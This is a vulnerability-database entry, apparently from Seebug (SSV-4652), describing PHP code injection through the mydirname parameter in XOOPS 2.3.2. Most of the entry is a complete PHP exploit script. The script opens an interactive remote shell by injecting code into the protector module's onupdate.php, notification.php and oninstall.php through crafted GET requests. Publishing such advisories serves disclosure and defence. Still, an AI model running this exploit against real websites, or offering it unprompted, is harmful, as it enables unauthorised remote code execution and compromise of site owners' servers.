XOOPS mydirname参数多个PHP代码注入漏洞

基本字段

漏洞编号：: SSV-4652

披露/发现时间：: 未知

提交时间：: 2009-01-12

漏洞等级：

漏洞类别：: 嵌入恶意代码

影响组件：: Xoops
(2.3.2)

漏洞作者：: 未知

提交者：: Knownsec

CVE-ID：: 补充

CNNVD-ID：: 补充

CNVD-ID：: 补充

ZoomEye Dork：: 补充

来源

漏洞详情

贡献者 Knownsec 共获得 0KB

共 1 兑换了

PoC (非 pocsuite 插件)

贡献者 Knownsec 共获得 0.15KB

#!/usr/bin/php -q <?php /**************************************************************** * XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit * * by athos - staker[at]hotmail[dot]it * * http://xoops.org * * * * thanks to s3rg3770 and The:Paradox * * * * works with register globals on * * note: this vuln is a remote php code execution * * * * Directory (xoops_lib/modules/protector/) * * onupdate.php?mydirname=a(){} [PHP CODE] function v * * oninstall.php?mydirname=a(){} [PHP CODE] function v * * notification.php?mydirname=a(){} [PHP CODE] function v * ****************************************************************/ error_reporting(0); list($cli,$host,$path,$num) = $argv; if ($argc != 4) { print "\n+--------------------------------------------------------------+\n"; print "\r| XOOPS 2.3.2 (mydirname) Remote PHP Code Execution Exploit |\n"; print "\r+--------------------------------------------------------------+\n"; print "\rby athos - staker[at]hotmail[dot]it / http://xoops.org\n"; print "\rUsage: php xpl.php [host] [path]\n\n"; print "\rhost + localhost\n"; print "\rpath + /XOOPS\n"; exit; } exploit(); function exploit() { global $num; if ($num > 3) { die("\n$num isn't a valid option\n"); } else { yeat_shell(); } } function yeat_shell() { while (1) { echo "yeat[php-shell]~$: "; $exec = stripslashes(trim(fgets(STDIN))); if (preg_match('/^(exit|--exit|quit|--quit)$/i',$exec)) die("\nExited\n"); if (preg_match('/^(help|--help)$/i',$exec)) echo("\nExample: uname -a\n"); if (preg_match('/^(about|--about)$/i',$exec)) echo("\nstaker[at]hotmail[dot]it\n"); print data_exec($exec); } } function data_exec($exec) { global $host,$path,$num; if ($num == 1) { $urlex = "/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}"; } if ($num == 2) { $urlex = "/xoops_lib/modules/protector/notification.php?mydirname=a(){}"; } if ($num == 3) { $urlex = "/xoops_lib/modules/protector/oninstall.php?mydirname=a(){}"; } $exec = urlencode($exec); $data .= "GET /{$path}/{$urlex}{$exec}function%20v HTTP/1.1\r\n"; $data .= "Host: {$host}\r\n"; $data .= "User-Agent: Lynx (textmode)\r\n"; $data .= "Connection: close\r\n\r\n"; $html = data_send ($host,$data); return $html; } function data_send ($host,$data) { if (!$sock = @fsockopen($host,80)) { die("Connection refused,try again!\n"); } fputs($sock,$data); while (!feof($sock)) { $html .= fgets($sock); } fclose($sock); return $html; }